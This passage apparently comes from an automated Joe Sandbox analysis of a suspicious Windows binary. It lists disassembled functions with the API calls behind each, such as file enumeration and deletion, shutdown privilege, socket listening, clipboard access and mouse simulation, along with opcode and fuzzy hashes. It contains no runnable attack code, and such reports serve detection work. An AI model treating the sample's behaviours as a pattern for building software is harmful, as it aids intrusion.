                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                        • API String ID: 3830820486-3289030164
                        • Opcode ID: 9a7995fd0c021e7a62df787a374a4fa0acefc4ff342b0310c690542db927788e
                        • Instruction ID: b5bef4f45f0b1e4ec6d40a323e403090bef8cdcf6a9ea0e955b8f60599955686
                        • Opcode Fuzzy Hash: 9a7995fd0c021e7a62df787a374a4fa0acefc4ff342b0310c690542db927788e
                        • Instruction Fuzzy Hash: 0CD14EB2508304AEC710EFA4D991EBBB7ECAF98704F04491DF589D6291EB74DA44CB62
                        Function 009F9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009F9663
                        • GetFileAttributesW.KERNEL32(?), ref: 009F96A1
                        • SetFileAttributesW.KERNEL32(?,?), ref: 009F96BB
                        • FindNextFileW.KERNEL32(00000000,?), ref: 009F96D3
                        • FindClose.KERNEL32(00000000), ref: 009F96DE
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 009F96FA
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F974A
                        • SetCurrentDirectoryW.KERNEL32(00A46B7C), ref: 009F9768
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009F9772
                        • FindClose.KERNEL32(00000000), ref: 009F977F
                        • FindClose.KERNEL32(00000000), ref: 009F978F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1409584000-438819550
                        • Opcode ID: 47fac364245d4efe0eb7c2b3e2067b468dfa7bd9c431db4124b85a9ef9b31269
                        • Instruction ID: d2afa46118386d5842fdfad62bb90abccaf32f258c4cab3bc2abbc651f8fc8d8
                        • Opcode Fuzzy Hash: 47fac364245d4efe0eb7c2b3e2067b468dfa7bd9c431db4124b85a9ef9b31269
                        • Instruction Fuzzy Hash: 6531BE3668061D7BDB10EFB4DC08BEE77ACAF49331F108556FA25E20A0EB34DA458B54
                        Function 009F979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009F97BE
                        • FindNextFileW.KERNEL32(00000000,?), ref: 009F9819
                        • FindClose.KERNEL32(00000000), ref: 009F9824
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 009F9840
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F9890
                        • SetCurrentDirectoryW.KERNEL32(00A46B7C), ref: 009F98AE
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009F98B8
                        • FindClose.KERNEL32(00000000), ref: 009F98C5
                        • FindClose.KERNEL32(00000000), ref: 009F98D5
                          • Part of subcall function 009EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009EDB00
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 2640511053-438819550
                        • Opcode ID: 52767a259a0767fb04b03579b77a9e7a262fd1c21e4e670a0c7570d5be5a564e
                        • Instruction ID: 5a013c9048e4385c520651e864208206b83a1f58efba9c0c15ea1501c0c44cb4
                        • Opcode Fuzzy Hash: 52767a259a0767fb04b03579b77a9e7a262fd1c21e4e670a0c7570d5be5a564e
                        • Instruction Fuzzy Hash: 9331923554061D7ADB10EFA4DC48BEE77ACAF46370F148555E924A2190DB70DE858B60
                        Function 009F8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 009F8257
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 009F8267
                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009F8273
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009F8310
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F8324
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F8356
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009F838C
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F8395
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CurrentDirectoryTime$File$Local$System
                        • String ID: *.*
                        • API String ID: 1464919966-438819550
                        • Opcode ID: 761b1e5316684d30f62eea72f55c2fbe523b6eb04a601e46fb821829132a9c68
                        • Instruction ID: 61f850be3772329072a25edf183e4a1bf34625926c398fdaaf2e10422500f0db
                        • Opcode Fuzzy Hash: 761b1e5316684d30f62eea72f55c2fbe523b6eb04a601e46fb821829132a9c68
                        • Instruction Fuzzy Hash: EE615BB25083499FCB10EF64C840AAFB3E8FF89714F04891DFA9997251DB35E945CB92
                        Function 009ED076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2
                          • Part of subcall function 009EE199: GetFileAttributesW.KERNEL32(?,009ECF95), ref: 009EE19A
                        • FindFirstFileW.KERNEL32(?,?), ref: 009ED122
                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 009ED1DD
                        • MoveFileW.KERNEL32(?,?), ref: 009ED1F0
                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 009ED20D
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009ED237
                          • Part of subcall function 009ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,009ED21C,?,?), ref: 009ED2B2
                        • FindClose.KERNEL32(00000000,?,?,?), ref: 009ED253
                        • FindClose.KERNEL32(00000000), ref: 009ED264
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                        • String ID: \*.*
                        • API String ID: 1946585618-1173974218
                        • Opcode ID: d7d0c16dbc88b81ed00f1bd9278975e57200ca03eb13b82241ca5eb4563665be
                        • Instruction ID: fc0d859c3f5596cbc192058b0d86b6fba74b47f2284761bb74bc4d88b1be8e2a
                        • Opcode Fuzzy Hash: d7d0c16dbc88b81ed00f1bd9278975e57200ca03eb13b82241ca5eb4563665be
                        • Instruction Fuzzy Hash: 97613B3180614DABCF06FBE1CA52AFDB779AF95300F248165E41277291EB35AF09CB61
                        Function 009FED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        • API String ID: 1737998785-0
                        • Opcode ID: 2b6bca281e77385d0d50c35265b66065e401f8e3a6389816bd7944d975d99326
                        • Instruction ID: 58ba85d120d0ab93a53e7052bacae95d19885df95610905466e01ea04b53c95c
                        • Opcode Fuzzy Hash: 2b6bca281e77385d0d50c35265b66065e401f8e3a6389816bd7944d975d99326
                        • Instruction Fuzzy Hash: BC419F35604611AFE310DF55E848F69BBE9FF44328F14C499E5658B6B2C735EC42CB90
                        Function 009EE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009E170D
                          • Part of subcall function 009E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009E173A
                          • Part of subcall function 009E16C3: GetLastError.KERNEL32 ref: 009E174A
                        • ExitWindowsEx.USER32(?,00000000), ref: 009EE932
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                        • String ID: $ $@$SeShutdownPrivilege
                        • API String ID: 2234035333-3163812486
                        • Opcode ID: 64c6a279782d40f6b5dd93c58e14eb8f2793cff46f41ad7eac102bcfddc17468
                        • Instruction ID: 28f6f8959552b6f84103c68e5311d8a1a15f609e4a7be9de33ae0270154ce445
                        • Opcode Fuzzy Hash: 64c6a279782d40f6b5dd93c58e14eb8f2793cff46f41ad7eac102bcfddc17468
                        • Instruction Fuzzy Hash: C7014972650251ABEB1662B69C86FFF72DCA708790F144821FC03E31D3E6B49C4481A0
                        Function 00A01204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A01276
                        • WSAGetLastError.WSOCK32 ref: 00A01283
                        • bind.WSOCK32(00000000,?,00000010), ref: 00A012BA
                        • WSAGetLastError.WSOCK32 ref: 00A012C5
                        • closesocket.WSOCK32(00000000), ref: 00A012F4
                        • listen.WSOCK32(00000000,00000005), ref: 00A01303
                        • WSAGetLastError.WSOCK32 ref: 00A0130D
                        • closesocket.WSOCK32(00000000), ref: 00A0133C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLast$closesocket$bindlistensocket
                        • String ID:
                        • API String ID: 540024437-0
                        • Opcode ID: 20822531e79c8fdfc4ecfd778e28a340cabecaa48b81d2d5b198792db2bea879
                        • Instruction ID: b156730e1f2438357b20b814dc2b0175e18c103e8637b36d4aa1cf65ea985975
                        • Opcode Fuzzy Hash: 20822531e79c8fdfc4ecfd778e28a340cabecaa48b81d2d5b198792db2bea879
                        • Instruction Fuzzy Hash: 44416171A001049FD710DF64D484BA9BBE5AF8A328F188198E8569F2D2C771ED82CBE1
                        Function 009ED3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2
                          • Part of subcall function 009EE199: GetFileAttributesW.KERNEL32(?,009ECF95), ref: 009EE19A
                        • FindFirstFileW.KERNEL32(?,?), ref: 009ED420
                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 009ED470
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009ED481
                        • FindClose.KERNEL32(00000000), ref: 009ED498
                        • FindClose.KERNEL32(00000000), ref: 009ED4A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                        • String ID: \*.*
                        • API String ID: 2649000838-1173974218
                        • Opcode ID: 4836b4977d9979cb26766df3d333865138da2806662b18542be7dee94f491915
                        • Instruction ID: 3eb4008e75c4162c7ed8d7f56e46e75b0f395c44249bfb2a9df6af9a4a3e6d7d
                        • Opcode Fuzzy Hash: 4836b4977d9979cb26766df3d333865138da2806662b18542be7dee94f491915
                        • Instruction Fuzzy Hash: 95314F710093859FC305FF64D8919AFB7A8AEE5314F448A1EF4D1522E1FB35AE098763
                        Function 009BE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: 3178a6b6dca99dabbb24f07e23ff44aa9f0e88817b4f06eb187c6ff645702daa
                        • Instruction ID: e40e6341e13223f4ecc4e4afc9c95d0fede2666e839a7a762a3cc9fc49d406df
                        • Opcode Fuzzy Hash: 3178a6b6dca99dabbb24f07e23ff44aa9f0e88817b4f06eb187c6ff645702daa
                        • Instruction Fuzzy Hash: 43C25C71E046288FDB25CF28DE507EAB7B9EB85314F1445EAD44DE7241E778AE818F40
                        Function 009F648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 009F64DC
                        • CoInitialize.OLE32(00000000), ref: 009F6639
                        • CoCreateInstance.OLE32(00A1FCF8,00000000,00000001,00A1FB68,?), ref: 009F6650
                        • CoUninitialize.OLE32 ref: 009F68D4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 886957087-24824748
                        • Opcode ID: a812dd594d154f608c609563f67f806fbf3daf4117d72ecbab943f8f583d1f92
                        • Instruction ID: f24aa4de5dee947509c7ed0c7613113d94649349e730deb5700ff0884b797ea4
                        • Opcode Fuzzy Hash: a812dd594d154f608c609563f67f806fbf3daf4117d72ecbab943f8f583d1f92
                        • Instruction Fuzzy Hash: 37D14771508305AFD304EF24C881A6BB7E8FFD8704F14496DF5959B2A1EB71E909CBA2
                        Function 00A022DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00A022E8
                          • Part of subcall function 009FE4EC: GetWindowRect.USER32(?,?), ref: 009FE504
                        • GetDesktopWindow.USER32 ref: 00A02312
                        • GetWindowRect.USER32(00000000), ref: 00A02319
                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A02355
                        • GetCursorPos.USER32(?), ref: 00A02381
                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A023DF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                        • String ID:
                        • API String ID: 2387181109-0
                        • Opcode ID: f4589c0cfb366630386baa2a4d65320a4ede1faf619d9f4520c070797f357885
                        • Instruction ID: 9c1d843e177fc0f13dca1bc2474789fc8d2b6c7d197f10242caca0825a558a11
                        • Opcode Fuzzy Hash: f4589c0cfb366630386baa2a4d65320a4ede1faf619d9f4520c070797f357885
                        • Instruction Fuzzy Hash: 77310072144309AFC720DF54D848B9BBBEAFF84720F004919F9949B191DB34EA09CB92
                        Function 009F9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 009F9B78
                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 009F9C8B
                          • Part of subcall function 009F3874: GetInputState.USER32 ref: 009F38CB
                          • Part of subcall function 009F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009F3966
                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 009F9BA8
                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 009F9C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                        • String ID: *.*
                        • API String ID: 1972594611-438819550
                        • Opcode ID: a6042b7cbe9942dc3f9e55f5d950c88f3576a3168aa88ba9b4ab4cb560a3f5a2
                        • Instruction ID: 005b2b8fe4840af436a0d953e47155a1843974b9bb012cd9fb7434fbf9ebd1c3
                        • Opcode Fuzzy Hash: a6042b7cbe9942dc3f9e55f5d950c88f3576a3168aa88ba9b4ab4cb560a3f5a2
                        • Instruction Fuzzy Hash: B441617194420EAFCF14EFA4C845BFE7BB8EF45311F148156E959A2291EB309E85CF60
                        Function 0099997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00999A4E
                        • GetSysColor.USER32(0000000F), ref: 00999B23
                        • SetBkColor.GDI32(?,00000000), ref: 00999B36
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Color$LongProcWindow
                        • String ID:
                        • API String ID: 3131106179-0
                        • Opcode ID: d55eb680deb26687ec5b3d5adcf665e260830df5820aa152782ebf17c942ff7b
                        • Instruction ID: 687d6db51d23725e2337327d944a05e8ca5b0b7e2b9134cf6a1617bc50e7345f
                        • Opcode Fuzzy Hash: d55eb680deb26687ec5b3d5adcf665e260830df5820aa152782ebf17c942ff7b
                        • Instruction Fuzzy Hash: DBA12970149504BFEF28DABC8C98FBF669DEB86350F14860EF402D6691DA29DD41D272
                        Function 00A01806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00A0304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A0307A
                          • Part of subcall function 00A0304E: _wcslen.LIBCMT ref: 00A0309B
                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A0185D
                        • WSAGetLastError.WSOCK32 ref: 00A01884
                        • bind.WSOCK32(00000000,?,00000010), ref: 00A018DB
                        • WSAGetLastError.WSOCK32 ref: 00A018E6
                        • closesocket.WSOCK32(00000000), ref: 00A01915
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 1601658205-0
                        • Opcode ID: fedf23f35654e826a764ce0c4d461d757e8122dbe0a09ceed7e13790dd09f20d
                        • Instruction ID: 20eb5b58ad12015abd7c8d47d7c5050cb729c8f478fc71b683dbf1154d0f4c1f
                        • Opcode Fuzzy Hash: fedf23f35654e826a764ce0c4d461d757e8122dbe0a09ceed7e13790dd09f20d
                        • Instruction Fuzzy Hash: 9951A271A00200AFEB10EF64D886F6A77E5AB84718F18C498FA159F3D3D771AD41CBA1
                        Function 00A11C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
